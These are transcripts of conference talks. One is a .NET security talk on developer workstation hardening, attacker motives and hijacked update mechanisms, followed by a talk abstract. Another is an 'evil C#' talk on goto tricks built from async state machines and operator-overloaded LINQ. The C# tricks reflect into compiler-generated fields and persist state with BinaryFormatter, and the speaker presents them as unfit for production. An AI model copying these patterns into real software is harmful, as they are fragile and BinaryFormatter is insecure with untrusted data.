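        Console.WriteLine(result);
    }
}
```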
So if you have an assembly coder writing for a game, and he's written the best game in detection, loop of all time, and assembly code that.NET could never touch, you can now natively map that. And I'll show that later on. That you can have a normal.NET call going into pure assembly code. And you can take the.NET runtime and Java runtime and mix and spin up a Java runtime inside of the.NET runtime. That there is things that are stable and easy. And most of them are free. Some of them cost a lot of dollars. But when you want to go to mobile, when you want to build once and deploy everywhere, you build business logic. You can go to a 1990s Nokia Symbian phone. It's now a little deprecated. But it's that idea that whatever platform you want to go to, that.NET can basically take you there. Whether it's a gaming console, embedded hardware, and that's kind of the unspoken beauty of.NET. So let's go on a quick tangent. My tips to the developer. As a security person, I go to companies and I help them defend their applications. I help them defend their infrastructure. I help them do security code reviews and security unit test implementation and life cycle. But also there's the people and the developers. And the developers to me are incredibly critical. Some of the security tools for me that have the most power for the least effort. Virtual systems using crypto, full disk, firewalls, security unit tests. And that's, it sounds like, when you actually get to implementation of firewalls or sandboxes, as a developer, they can come incredibly handy. That a sandbox can help in the testing environment. Where you want to constantly revert or you want to control state or you want to dissect changes, sandboxes come incredibly helpful. Firewalls are really good at logging and hunting down network errors if you're doing communications and timing glitches. These different things can actually help. They're not just security impedances. And so when I come into a company and I sit down in front of a development team, I see incredible risks. That developers have basically the keys to the kingdom. We're the ones that build the locks. We're the ones that build the keys. We're the ones that work with the critical systems day to day. And that this is a point to defend. Since I'm talking to developers, of course, I'm going to talk about that. And on a typical bad developer box, I might see everything crammed together. Databases, keys, visual studios, all sorts of web traffic. And this is for me in terms of going after a company. I understand the developer world and I've tried to identify security risks in the development environment. And unfortunately, visual studios is one of the, has a few known vulnerabilities where someone can write code, put it up on the internet when you look at that code, specifically the forms, it runs arbitrary code on you. That visual studios itself can be a threat. That browsers are a threat. And you have the keys to the kingdom. If someone steals your laptop, this is what they should see. Just complete crypto. That you have to unlock the laptop. And inside of the laptop when you unlock it, it would be best if there was multiple crypto blobs. And I'm going to try and condense, like two days out of a seven day course, into a few minutes. You have firewalls on there. You have the internet, but you have a restricted internet. You have all of this critical infrastructure on your laptop and you want to defend it. Inside of your box, you have a crypto blob. 
And this crypto blob is protected and houses a VM. This VM, you unlock it and this gives you whatever it has inside of it, right? You have multiple VMs. You have one that gets you online. You have one that you do development in. And so when you want to go browse Reddit and click through the internet, that's different than when you log onto your corporate network and access the database. And I recommend multiple VMs. It's really easy. And it's nice to have one VM that you go and check your email with. You do your banking with. You stay relatively secure and pure with. And another VM that when someone sends you a link that you want to click on, that you know you shouldn't click on, that there's another VM you go to. When you want to just go around the internet, there's another VM and you lock that VM down and use it for that purpose. When you want to do development and you want to push to an enterprise-wide change, there's another VM. When you want to access critical documents and infrastructure, you keep your data secure. And each of these is inside of a crypto blob. So your niece comes up to you and wants to use your laptop and you open up the VM so she can just cruise the internet. Everything else is in a crypto blob that's locked down. And so even if somehow she got infected, someone broke out of the VM, they're inside of a computer with multiple crypto blobs. And you can say, well, if I close the laptop and throw it in the ocean, then they are not getting whatever they were trying to get. And it's easy. It's when it comes down to it, you're talking about true crypt or whatever discrypto you choose. You're talking about putting a VM image inside of that, mounting that as a drive, mapping that with a hot key. You hit a hot key, you put in a password and it unlocks. And inside of dev crypto, you have Visual Studios that goes to a sandbox for testing so you can iterate through, not sandboxing for security, but sandboxing for speed of testing. You're connected to secure network infrastructure. You're basically using those keys that you have over your company. In the web, you have a sandbox. Inside the sandbox, this as security is housing a browser and stopped with a firewall. So you can only, in this sandbox, you can only use port 80. You don't need FTP going into this box. You don't need SSH going into this box. You're only browsing in this box. And so you lock it down. And by default, you have scripts off. And when you have the box that you go cruise the good internet that houses your personal life, you have multiple sandboxes for keeping it clean and wiping down the information. Not so much protecting you, but protecting you in the future. And that comes down to authentication. We talk about passwords that aren't hard to remember. So you can use them on a daily basis. Physical tokens that are easy to replace. And fingerprints or whatever biometrics. And it basically comes down to three factors. Something you know, something you have, and something you are. And unfortunately, this doesn't in the daily life work. You want your smart card to be so cheap that you don't care about it. You I recommend Yuba keys and that you for, I think, 20 US dollars, you get a Yuba key, it stores a really long complex password, you put a short password with that and it becomes incredibly hard. If you lose your Yuba key, definitely buy backups, because not only can you lose them, but they do expire. They do die. They are physical digital devices. You just grab another one out of the vault. 
If it's logging you into your core infrastructure of your network and your company, you just go to IT and say, hey, I need another access token. I need you to change my token and give me a new random 30 character, 60 character password. Fingerprints, to me, I don't get them. I don't understand how people think this is secure. If you work at company A today and you log in with your fingerprint and you go work at company B, you can't change your fingerprint. This seems unsustainable and just unreasonable, but there's multiple multi-factor authentication types. And we're still trying to figure this out. And I recommend finding your own solution. Everyone should find their own thing that works for them on a daily basis. So I recommend, I like Firefox because it gives a little more privacy, but any platform basically has the ability to turn off scripting. If you come into add-ons, privacy and security, there's no script. There's ad block. There's ghosty. And some of them are about security, like no script and ad block and ghosty are more about privacy. And there's multiple faces of security. And so I highly recommend using no script that this has saved me so many times from attacks that I, it's also saved me so many times when I want to do different attacks, having scripts off can also become handy. It also comes into anonymity that when you're browsing the Internet using proxies, hiding your identity is good for a normal person and for someone that is a developer or in security. So my top three tips, useful discrypto. Log into your laptop. You can do this with biometrics. I'll look at that a little later, the security of biometrics itself. And having admin and email and having your admin part of your identity separate from your identity. That if you send me emails from address A and you go to your bank and unlock it with address A, I know how to attack that. If you log in to it with some random Gmail address, whatever address, and you don't use that for any part of your public identity, that that stands up a little better in the day to day. That if I send you a malicious email and you click on it accidentally and it's in your public identity, then I don't have access to you at that time with the same email address as the one you log into your bank. And if I send you a malicious email to you at your bank, you are much less likely to click on that link. If I say, hey, we met at the conference and I was really interested in your company, just click this link and fill in the form and I send it to your banking address, you know that you did not give me your banking address. And so I highly recommend separating your admin identity from your day to day identity. Keep them completely separate. And that's a really good buffer. And whatever your password scheme is, find your own that works for you. Find a way to keep your passwords not the same everywhere, but in all honesty, looking at most people, they have 100 or 200 passwords, user names, identities on different platforms. And whether that's dealt with cloud storage, password management like LastPass, on disk, KeyPass, KEE, Pass. And these different implementations, LastPass in the cloud, KeyPass on your side, are steps. Everyone needs to find their own way to manage it because there is no one solution. If KeyPass or LastPass became the standard across the world, it would be attacked across the world. That in actuality, what keeps us a little more secure is a fair amount of diversity. 
So that's my really long tangent for: hey, you're a developer, here's the security I recommend. So, back to bending and breaking, actually looking at the .NET Framework, at what we're dealing with on a day-to-day basis. There's a hierarchical structure that allows you to do certain things with certain objects. When you're attacking a SQL communication object deep in someone's business application, what can you do to it? And when you're looking at IL, there are all sorts of tiny little gotchas that can make a difference not only in security, but in speed and performance. If you have a short jump, which is a branch, an if branch, whose target can be expressed as an 8-bit offset relative to its own location, that is different from a branch that has to reach further than an 8-bit offset allows, and IL instructions have a size; so there's actually a 32-bit and an 8-bit form of a branch. In the same way, there's a difference between an i equals 7 and an i equals 9; these are two differently weighted things. And this is what speaks back to the developer: in IL, your branch is encoded one way or the other, and for the int example, the constants 0 through 8 are hard-coded as single one-byte IL instructions, while anything above 8 is encoded as an opcode plus a number. So if you have a small loop and you can keep it to 8 or less, you can actually see a size and speed improvement. And looking at being able to bend and break the rules, you can start considering that the break instruction you hit when debugging is itself a line of IL, and that these are all codified, basically RFCs, standards, defined, and they start letting you think about things in a different way: you can now think in terms of a memory-to-memory copy instruction. So if I say I want data structure A copied into data structure B of a different type, and this has to be incredibly fast, it has to run 100 million times a second, then the fastest way to convert an object is a bit blit, where you take a run of bytes at location A and put it at location B, and you just happen to be pulling it from one data structure and putting it onto another. When I was processing network streams this was incredibly important. When I wanted to push gigabytes of data through a network stream, I needed bit blitting, and it can be carried out from assembly code, from C++ interoperating with .NET, or from pure .NET. And that's what I'm trying to bring back: what you do in C sharp or VB sits on top of IL, IL is underneath, and you can code in and use IL itself. And you can duplicate values; dup is one of my favorite IL opcodes ever. I use it all the time: when I come across a variable somewhere, I duplicate it and branch and split it into two places. I think it's just a beautiful line of IL. It doesn't have too much to do with much. And there are two different classes of people when you talk about attackers. There are hackers that are there to have fun with your system; for the most part, whether they succeed or fail, you'll never notice they're there. And there are attackers where, if they're successful, you'll probably either know they're there or you won't. And you're developing a product. You have a production facility, and it produces a product. You have clients that use this product, and clients give you money.
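A sketch of the IL size details from the first part of this passage, written as C# with the simplified IL the compiler emits shown in comments; the exact opcodes depend on the compiler and optimization settings.

```csharp
using System;

class IlSizes
{
    static void Main()
    {
        Console.WriteLine(Sum());
    }

    static int Sum()
    {
        int a = 7;      // ldc.i4.7        - constants 0..8 get dedicated one-byte opcodes
        int b = 9;      // ldc.i4.s 9      - 9 needs an opcode plus a one-byte operand
        int total = 0;  // ldc.i4.0

        for (int i = 0; i < 8; i++)   // the loop-back jump fits the short form (br.s/blt.s,
        {                             // an 8-bit relative offset); a large body forces the
            total += a + b;           // 32-bit form (br/blt) and a bigger method
        }

        // The speaker's favourite opcode, dup, simply copies the value on top of the
        // evaluation stack so one computed value can feed two consumers.
        return total;
    }
}
```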
And this is kind of the basic life cycle that I see when I look at a developer's world and a company's world. And that part that we're primarily concerned about is that coupling between users and money. And hackers are like, haha, I cracked you. It's fun. And you're like, well, that's all my money. And they're two fundamentally different groups of people. They have completely different goals. And for the most part, when you're talking about cracks, you're talking about they're finding a flaw in your code. They're making a modification. And it's for completely different reasons than when a hacker, an attacker comes after your company or your product. And typically with a cracker, they're either doing it for enjoyment. They're doing it because they just want your system to work differently. Or they have a little bit of infrastructure that they need to support. Typically when you put out cracks, and why do you put out a crack? What is the driving factors? So say you put out a crack and you're able to infiltrate a product that has a million users, 10% of that user crack, and you're able to take over that many machines. You now have an immense processing facility, data storage facility, proxy facility. And this is incredibly valuable to a day-to-day implementation life cycle of a hacker. That if I can say I have a proxy network of 10,000 machines that I can use at any time, they're not traceable to me because I no way paid for them. And I can wipe down my tracks on those machines willy-nilly. That's incredibly powerful. If I can say I can utilize 500,000 CPUs and GPUs to crack a password, that's powerful. And it's a different incentive that you happen to be going after the thing that's connected to the money, but you don't actually truly care about the money. That's not part of the goal. It still has the same impact where it gets used up. The facility goes out and the product might eventually die. But that's not your goal. But when you're talking about, oh, I want to steal a product. I want to take their product and I want to rebrand it as my own. I've seen that. I've seen lots of people who are under attack and someone is rebranding what they do. And someone wants to steal their users or their production or their money flow. That's a different motive. And when it comes down to it, building a secure app and a secure infrastructure and using the right security, this is what we're responsible for as developers. In an infrastructure and an enterprise, we make the base decision that changes the implementation of the enterprise and the security is built on that implementation and is often limited by that implementation. The tiny choices, whether we decide to use this protocol or that protocol, this storage or that storage, makes a world of difference in the actual security implementation of the entire enterprise. And whether we decide that we're using SQL and we're going to store the database credentials inside of the executable and don't worry, we'll encrypt it inside of the executable. No one can get the database credentials out of that. But as a hacker, as an attacker, you can use access to a database to take over the database server. You can use access to different things to just take over and rip through an enterprise end to end because a developer decided to use that. I highly recommend a service-based architecture. Put something in between you and the database. Use credentials but not database credentials. Your system should authenticate the user based on its inside. It's this user. 
They do have access to these infrastructure and that goes through an ORM. It goes through entity or hibernate or whatever it might be. And I often recommend entity over anything else because it's one of the few that's default secure against SQL injection. When you talk about SQL cleaning, you will almost always lose SQL cleaning fights because six months from now, a year from now, ten years from now, someone finds one tiny little flaw that they're able to bypass your SQL cleaning and whether or not you know about it or whether or not you know about it and decide to go back and fix your mistake. That SQL cleaning in the real world is like AV. It just doesn't stand up to anything. That if someone wants to get through it, they do. And we can try and lock down our application and obfuscate it and defend it. Bad news, obfuscation is programmatic and basically anything done programmatically can be undone programmatically. And for, I would say, 80, 90% of the obfuscation and protection market, there is a off the shelf hacker tool for free that rips it apart. And you can take weeks and weeks of work to get a properly defended application and drag it and in six seconds you have a completely undefended application. And I, it's not as easy as it sounds. Also, in obfuscation, just a quick side note, publics are not typically obfuscated because they're considered to be more like an API. So unfortunately, you want to go through and make as much of it private as you can. And when we talk about a hacker, an attacker attacking our company, they're not trying to build a botnet out of our user base. They might break all of the links, but then they might take our product and attack our clients. So one of the most critical and vulnerable systems that I see that isn't defended is your update mechanism. That the way that you push updates to your clients means the same way that I could push updates to your clients. And whether it means I go to their network and take over their network and then say, yes, I'm xyz.com. Here's your new payload. Please run malware across your entire enterprise client base on a local network. Or somehow I take over your web server or I reroute your domain for just a couple of minutes and I'm able to take over your user base. That is a critical system that you should be doing crypto for security and crypto for validation. And I'm using that public private key crypto showing that I encrypted it with my private key that hopefully no one else can figure out. And if I signed it, if I encrypted it with this key and not AES, like I hard code a password in and I encrypt it with AES and I send it to you and you use the hard coded password that's in your executable that anyone can see and decrypt it and install it. And that's one of the subsystems that is the most devastating to companies because it's one thing to lose your money supply for a couple of months. It's another thing to have your entire credentials as a company destroyed because you pushed malware to massive enterprises and crippled their security that they spent millions of dollars setting up. Or the hacker just takes your product and does something malicious or crazy with it and weaponizes it or whatever it might be and you might not think that your product has much value outside of its domain because you're using it for that but someone decides to use it as a DLL in their attack application or repackage it and ship it out somewhere. 
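A minimal sketch of the signed-update validation described above, the alternative to shipping a hard-coded AES password: the client holds only the vendor's public key and refuses any payload whose signature does not verify. Key handling and the file name are simplified and hypothetical; both sides are shown in one program only to keep the snippet self-contained.

```csharp
using System;
using System.IO;
using System.Security.Cryptography;

class UpdateSigning
{
    static void Main()
    {
        byte[] payload = File.ReadAllBytes("update.zip");   // hypothetical update package

        using (RSA vendorKey = RSA.Create())
        {
            // Build-server side: sign the payload with the private key.
            byte[] signature = vendorKey.SignData(payload,
                HashAlgorithmName.SHA256, RSASignaturePadding.Pkcs1);

            // Client side: only the public half is shipped, so there is nothing secret
            // to extract from the executable.
            RSAParameters publicOnly = vendorKey.ExportParameters(false);
            using (RSA verifier = RSA.Create())
            {
                verifier.ImportParameters(publicOnly);
                bool genuine = verifier.VerifyData(payload, signature,
                    HashAlgorithmName.SHA256, RSASignaturePadding.Pkcs1);
                Console.WriteLine(genuine ? "Signature OK - install" : "Refuse the update");
            }
        }
    }
}
```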
And they go after maybe your infrastructure, your routers, take over your access to bank accounts or whatever that might be and just basically cause mayhem and destruction. And the hacker world is kind of like, well, we control your databases. You are asking us to build your protection. You're using typical IT best practices infrastructure. We're the ones that define the internet. We are the ones that basically create your implementations. And it comes back to the developer. It comes back to the choices we make. Do we use SQL or do we use an ORM that gives us access? Do we use a service-based architecture? Do we use direct TCP pipes? Like these things make a world of difference when you're trying to put security on top of them. And baking insecurity from the ground up is important. And that's kind of what I also wanted to bring back, that you can take my applications and look through them. That I've looked over other people's applications and found that they were doing crypto. But they were doing it completely wrong. That they weren't doing vector initialization. They were using the wrong implementation. And in some cases, they just didn't turn it on. And then you can actually go and vet the security of other people's applications that you use, the implementation that they use, and not just consume it. And as an attacker, you can basically do anything to an application on your box. You can, as an attacker, try and go and gain access to other boxes. And in the real world, it's actually quite easy to gain access to other boxes. And I'd like to wrap that up and have a little bit of Q&A and cover different implementations. I'll do a little bit of code, and I'll walk through the different techniques that I do. I'll cover that a little bit now. We'll take a break and then come back and do another speech. And I'll get into stuff that actually, on the day-to-day, that I do to hack. That what does it look like to reach into someone else's application and remold it? What does it look like to use someone else's executable as a DLL? What does it look like to take a Visual Studio's project and weave in all of this hacker technology? And so that's it for now, and hopefully I'll see you at the next speech in a few minutes. Thank you.
|
When I first entered the security world as a .NET hacker it was unfriendly territory, as .NET was a black sheep in the hacking world. The current world of hacking is warming up (a bit) to the .NET hacker. Tools and skills are becoming more prevalent, targets and value are everywhere, and the need for .NET security is pressing. This presentation will give the .NET hacker current hacking tools and show a path for developing hacking under the .NET Framework. It will focus on the world of the .NET hacker and not on programming: learn basic hacker tools for leveraging a network breach to infect and take over a critical system/application; see what a hacker sees when they look at an application, and how one crack in the security landscape can give a hacker full access; learn how combining Java, Pascal, and raw machine code into your application has value. This will be different from a normal hacking 101, as it is focused completely on the .NET Framework for the average developer. A second speech will focus on the code and process that one uses to do .NET hacking. Suggested reading: The Hacker Manifesto.
|
10.5446/51450 (DOI)
|
Okay, I make it 20 past 10. Good morning, everyone. This is good. I had heard some rumors of Norwegians being reluctant to participate in things. I'm hoping this is untrue, so everyone wave your hands in the air. Everyone go, whoo! Okay, good. Frankly, I live on the audience feedback, particularly for a session like this. Hands up, those of you who came here hoping to learn something useful about C-Sharp, go now. This is not intended to be a session to help you with any productive C-Sharp whatsoever. It is all evil stuff that you should in no way ever use in production code. Okay, the neat little tips and tricks, well, tricks, but not tips. When I first presented most of this code in Codemash, I had a few members of the C-Sharp development team present. Is Scott Guthrie watching this somewhere? No? Okay, I was hoping that I could make him cry. Maybe he'll see the recording. So, yeah, trying to get any useful information about C-Sharp out of this is like watching a Star Trek film and trying to get physics. Okay, it's not going to happen, but I hope we'll have a lot of fun. It's just for entertainment. So, I hope I can make you cry a little with some weird stuff. So, let's start off with some not C-Sharp, in fact. Some basic. How many of you started, how many of you had your first programming language was basic? Good, I'm not the oldest one in the room then. So, this was, we had BBC Micros at school and typically everyone would start with something like this. I mean, in fact, the first version would just be 10 print hello, 20 go to 10. Yeah? Everyone's done that. Okay, so these are the good old days and it's a bit of a shame that we can't do this in C-Sharp. So, we have something similar, labels like this. So, we can do a labeled go to. We have the label up here and then as soon as we say go to loop, that will work. So, if I run this code and we want go to labels, it says hello and we can say keep going, yes, yes, yes, and then say no. And that's all very well, but you've got to have this label. Isn't it much cleaner and obviously much more maintainable to have line numbers? Thanks to C-Sharp 5, we can. So, here we have some code and I'll run this code and then we'll have a look and see whether people can work out how it works. So, this is go to async, the first version. So, we say keep going, keep going and then we eventually stop. Okay, let me just prove that this really is using the line number. So, you can hopefully see it's probably quite small, but line 18 is this keep going. If we look down there, it says line 18. So, if I change this go to 18 to go to 17, it should now do hello, keep going, hello, keep going, hello, keep going, hello. When I run this at code mesh, I managed to run the wrong program at this point and was mortified that it didn't change anything. So, there we go, hello, keep going, hello, keep going and then we can say no. And just one final proof point, if we go to 19, this should just say keep going once, but keep asking us for input until we do, until we press anything other than Y. So, good. So, are you satisfied that we've got go to with line numbers? Yeah? Satisfied that what I'm saying this program does, it actually does. Any ideas how it might work? It uses two of the new features of C sharp 5. Macros, no, we don't have macros in C sharp. We're not Lisp yet. So, let me reveal a little bit. Well, we can see that there's an await and we're going to await a go to action. 
Let me reveal a little bit which is why I had to change screens and why I wasn't going to change the font size again with everything up. If we just scroll over here a bit. So, now everything's clear, right? No. So, we're clearly using async and await, but there are no tasks involved here. Async and await basically builds a state machine. How many of you have used async a little bit? Yeah, even just to play around with. Have the basic idea. Okay? How many of you have looked into some of the details of what goes on behind the scenes? Okay, good. Those of you who haven't come to my talk tomorrow, the last slot basically of the conference. I'm doing C sharp 5 and exactly what level of detail I go into will depend on what people already know, but we may well cover the details there. So, basically, an async method, the compiler builds a state machine for you and it's all based on go to. It remembers what state you're in and when you await, it says, okay, I'll remember where I am and then later on you can come back to the same place, which is very nearly what we're doing, except we're saying we don't want to come back to the same place, we want to come back to somewhere else, which is basically if we have a state machine and it has a field remembering its state, all we've got to do is poke that state with a different value and things will be okay, right? So, here I await underscore, which is a line action. Line action is just a delegate, but I'm actually awaiting the results of calling this delegate and when I show you the declaration of line action, it will make a bit more sense, hopefully. So line action is a delegate that has call a line number attribute on the parameter, which means if you don't specify a value for this parameter, it will fill it in, the compiler will fill it in with the line number. So, effectively, our code is await, this is 17, 18, 19, 20, et cetera, et cetera. And then what this is actually doing behind the scene, so we have this go to executioner, remember the line action part and the go to action, I think go to action is just another delegate, and go to executioner remembers a mapping from line number to the internal state number that the state machine is generating for you. And it does this by when you await something, this line, so it's going to, at some point, it will call our entry method, passing in this line action that we're going to call to remember the line numbers, and if I go to executioner. So it passes in the line method created as a delegate for the record the line number part and go to for the rest. So the line method, when you call it, it returns an awaitable. And that awaitable remembers when you await it, it remembers the state that you are in when you await it. So we have a create awaitable, I have this idea of a state machine, there's already IA sync state machine is part of the framework, but I have various extensions on top of that, which basically use reflection to fetch and poke the state. So we happen to know that the generated state machine always contains a field called angle brackets one underscore underscore state. So all we need to do is fetch the value of the state when we await, because the compiler will have, when we're executing it, the compiler will store that state so that when we come back to it, all we've got to do to come back to that line is poke it with the same state that it is when we await it. 
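A condensed sketch of the two pieces just described: a delegate parameter marked [CallerLineNumber], so the compiler stamps each call site with its source line, and reflection that reads or writes the compiler-generated state field inside an async state machine. The field name "<>1__state" is a compiler implementation detail, not a contract, and the surrounding goto/awaitable machinery is omitted.

```csharp
using System;
using System.Reflection;
using System.Runtime.CompilerServices;

class CallerLineDemo
{
    // Because the parameter is optional and marked [CallerLineNumber], the compiler
    // fills it in at every invocation site - this is how each awaited call in the talk
    // knows which source line it sits on.
    delegate int LineAction([CallerLineNumber] int line = 0);

    static void Main()
    {
        LineAction whereAmI = line => line;
        Console.WriteLine(whereAmI());   // prints the line number of this call
    }

    // The other half of the trick: every async method compiles to a state machine with
    // a generated int field (currently named "<>1__state"). Reading it tells you where
    // the method is paused; writing a different value before MoveNext() runs again makes
    // its switch statement resume somewhere else - in effect, a goto.
    static FieldInfo StateField(IAsyncStateMachine machine)
    {
        return machine.GetType().GetField("<>1__state",
            BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic);
    }

    static int GetState(IAsyncStateMachine machine)
    {
        return (int)StateField(machine).GetValue(machine);
    }

    static void SetState(IAsyncStateMachine machine, int state)
    {
        StateField(machine).SetValue(machine, state);
    }
}
```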
So that's what get state and set state do, and all our go to executioner does is create an awaitable which always says, yes, I need to await, otherwise the state machine won't actually bother doing all the rest of the stuff, and then it's got this, a yielding a waiter has a cunning thing to say, right, what should we do when we've completed, either keep going as we were or go to somewhere else. The details of all of this are fiddly to say the least, I will attempt to make the code available at some point, but do you basically get the basic idea? So if we've got a state machine, what else could we do with it? Well, in fact, I think it was Kerala Senkov blogged a version of this, but one thing you can do with state is save it. So I have another example, save state, where the method just looks like this. So the first time we run it, we'll see this looks like this is the first time through, and we can just keep going until we hit N. So yes, we'll keep going, and then we're bored. So I is for, let's just finish there. And then next time we run it, I is for again, and we can continue, and we're bored again. So these are genuinely separate processes. We're just saving the state, and yes, yes, yes, and then we've completed. And we can add something else. So we could put string, sorry, let's get the current time, the start time. Obviously, you wouldn't use datetime.now in production code because it's horrible in various different ways, would you? You would use notetime, right? Okay, so let's just put, so this will be in a loop, kind of nasty, but okay, so we'll have deleted the state because we completed last time. So if we start up, okay, so it started at 1031, keep going, keep going, bored now, 1031.49 we're looking for, save state, 1031.49, and it keeps going. And we didn't have to say anything about, well, we've got another variable to save. Even though this is a local variable, the way the state machine is built, it will end up as a separate object. In fact, it's a struct on the stack until it needs to be an object on the heap because the way that async is implemented is quite ridiculously efficient. It's horrible, the hoops they go through to make it efficient, but it's great that it works. So all I'm doing is taking the instance of that state machine, finding only those fields which I actually want to persist because there are some that I don't, saving them just with the normal serialization, just a normal binary formatter, and I'm going through a few little bits and pieces so that we can save null references as well, and that's all it does. Right, I shall leave, I have another demo of retrying stuff, so it's more of the same really. We have a state machine. Imagine you could try some stuff and if it failed, a bit like onerrorisume next, except this is onerror, just go back to where we were because we don't want to bother writing a loop and a catch block and whatever. Just if something goes bang, just put us back to where we were before. But it's more of the same, so relatively boring. Let's look at some, now sort of old school, back in C sharp 3. I love Link, do you all like Link? Yeah? What do you like about it? Pardon? It's good. I'm looking for a little bit more detail. All of those people that ask questions on Stack Overflow are saying, my code doesn't work. I'm sure you don't really. Yeah? Composition. Yes, that's good. Pardon? Expressiveness. Yeah, the problem with Link is it's so wordy. You have to write so much code. We really want to make something a lot more concise. 
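One more sketch before the LINQ section, covering the save-state idea just demonstrated: reflect over the state machine's fields (the hoisted locals plus the state marker), serialize them with an ordinary binary formatter, and pour them back in later. The name-prefix filtering of builder and awaiter fields is a simplification based on current compiler naming.

```csharp
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.Serialization.Formatters.Binary;

static class StateMachinePersistence
{
    public static void Save(IAsyncStateMachine machine, string path)
    {
        var snapshot = new Dictionary<string, object>();
        foreach (FieldInfo field in machine.GetType().GetFields(
            BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic))
        {
            // The builder ("<>t__...") and awaiter ("<>u__...") fields cannot survive a
            // process restart; the prefixes are current compiler details, not a contract.
            if (field.Name.StartsWith("<>t__") || field.Name.StartsWith("<>u__"))
                continue;
            snapshot[field.Name] = field.GetValue(machine);   // hoisted locals + <>1__state
        }

        using (FileStream stream = File.Create(path))
            new BinaryFormatter().Serialize(stream, snapshot);
    }

    public static void Restore(IAsyncStateMachine machine, string path)
    {
        Dictionary<string, object> snapshot;
        using (FileStream stream = File.OpenRead(path))
            snapshot = (Dictionary<string, object>)new BinaryFormatter().Deserialize(stream);

        foreach (KeyValuePair<string, object> entry in snapshot)
        {
            FieldInfo field = machine.GetType().GetField(entry.Key,
                BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic);
            if (field != null)
                field.SetValue(machine, entry.Value);
        }
    }
}
```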
Let's have a quick basic demo of: I don't want to write all these words. I would rather have operators, because I'm a Perl fan. Instead of writing concatenation and Where and selecting things, I really want to use & as my where clause and | (pipe) as my select clause. Because then I save whole characters. It's really important. Let's look at what we think this LINQ-to-operators code should do. We've got hello world, how are you? And then we're going to subtract world. So the idea is I've taken every operator that you can overload in C sharp and overloaded it on this, I can't remember whether it's called EvilEnumerable or something like that, OperatorEnumerable. So every single operator does something, and we'll have a look at what some of them do in a bit. So we're going to take away world, leaving hello, how are you? And then we're going to add in today. So that leaves hello, how are you today? And then we're going to filter it. & is generally for kind of filtering-ish operations. So this is our where clause. So we're only going to keep words of length 5, and then we're going to uppercase them. Oh, and then we're going to write out this query three times. So if you've got a sequence, I'm not sure, but I think Python, even if it doesn't have multiplication for sequences, I think it does for strings. If you do hello times 3, it will return hello, hello, hello. Is that right? Any Python people? Yeah? Okay. So I reckon this should show hello world today, hello world today, hello world today, all in uppercase. Yeah? And it does. Oh, sorry, without the world, because we subtracted world. So that's the basic example. And all of this is actually reasonably simple. As soon as you've, I'm not kidding in this case. So if we look at the Evil extension method, all that does is create an OperatorEnumerable, because you can't overload operators on interfaces. Sad. The evil we could come up with if we could overload operators on interfaces. Wow, we could have a lot of fun then. But no, we've got to create this OperatorEnumerable, which just remembers the source, and it remembers it as IEnumerable of object because, hey, we might as well. It makes various other things interesting. And then we've just got the operators. So we have seen &, which just returns Where. I'm not going to re-implement all of LINQ to Objects. That would be crazy. That would be an entirely different talk. But we've got Where, we've got Select. The unusual thing here is normally operator operands aren't delegates. I can't remember ever seeing something where you use a lambda expression as an operand. So that's in some ways all that's different here. Just as random examples of what we've got: here we have arithmetic, minus, plus, star and slash. Any ideas what's going to happen when we use plus plus source and minus minus source? What would it make sense to do? Let's see. So we start off with arithmetic, minus, plus, star, slash. When you add a plus to it, it adds a plus. Just adds a little plus sign. When you take away minus, you know, minus minus, we take away the minus sign. It's kind of simple. Any other operators that you can think of that might have fun things? The sequence is just concatenation. We've seen normal concatenation. So you only overload the plus operator. So that's relatively straightforward. Division, was that? Excellent. That's what I was about to show. So we can use division in multiple ways.
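A cut-down sketch of the wrapper being described: a class holding an IEnumerable of object whose overloaded operators stand in for LINQ methods, with & as Where, | as Select, + and - as add/remove and * as repeat. The class name and the exact operator choices are illustrative.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

class OperatorEnumerable
{
    private readonly IEnumerable<object> source;
    public OperatorEnumerable(IEnumerable<object> source) { this.source = source; }

    public static OperatorEnumerable operator &(OperatorEnumerable src, Func<object, bool> predicate)
        => new OperatorEnumerable(src.source.Where(predicate));          // & filters

    public static OperatorEnumerable operator |(OperatorEnumerable src, Func<object, object> projection)
        => new OperatorEnumerable(src.source.Select(projection));        // | projects

    public static OperatorEnumerable operator +(OperatorEnumerable src, object item)
        => new OperatorEnumerable(src.source.Concat(new[] { item }));    // + concatenates

    public static OperatorEnumerable operator -(OperatorEnumerable src, object item)
        => new OperatorEnumerable(src.source.Where(x => !Equals(x, item)));  // - removes

    public static OperatorEnumerable operator *(OperatorEnumerable src, int count)
        => new OperatorEnumerable(Enumerable.Repeat(src.source, count).SelectMany(x => x));

    public override string ToString() => string.Join(" ", source);
}

static class Evil
{
    public static OperatorEnumerable ToEvil<T>(this IEnumerable<T> source)
        => new OperatorEnumerable(source.Cast<object>());
}

class Demo
{
    static void Main()
    {
        var words = "hello world how are you".Split(' ').ToEvil();
        var query = ((words - "world" + "today")
                     & (w => ((string)w).Length == 5)
                     | (w => ((string)w).ToUpper())) * 3;
        Console.WriteLine(query);   // HELLO TODAY HELLO TODAY HELLO TODAY
    }
}
```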
What would you expect to happen if we divide a sequence by something? Group by. Yes. So that's one option. So here we have a bunch of employees and we're going to divide by a delegate returning the department. So let's run it and then I'll see if I can move the. Okay. So division by a function. Let's just concentrate on that bit first. So we can see this is exactly doing group by. So accounting has Dave. Sales has Bill and Betty. Finance has Holly and Edward. And engineering has Diane and Tom. So that's division by a function for group by. We could also divide by an integer, which is just, you know, let's batch up this sequence into groups of, in this case, five. So if we start off with to be or not to be, and we just split it by spaces, we get ignore the fact that we've got extra commas because of the commas in the text. And if we're going to make division by an integer, divide things into batches, then we'd like that to give you know, whole batches, which means your remainder operation can then do whatever's left at the end. So division returns a sequence of sequences. And then the remainder just shows whatever's left, whatever doesn't fit into the final batch. How about the bitwise, yeah, bitwise negation, the twiddle operator. What does it look like? A wave. It's kind of a bit here and there and everywhere. So I thought it would be quite fun to do a shuffle. So when we run this, twiddle items, who knows, it might come out in any kind of order. Yes. Now, most of these operators that I've used don't change the thing that they're called on, which is a good thing. However, I would like to show you the hideousness of the unary operators. So this little segment owes itself to Eric Lippert, who used to be on the C-sharp compiler team and is now working for covariate. And I think it was in the annotated C-sharp spec. He said, the unary plus operator is the most useless thing that you could possibly have. It's only there so that you can put plus 10 as well as minus 10 for symmetry. I'm not entirely sure whether this code proves him right or proves him wrong. However, if we're going to have, we've got the unary 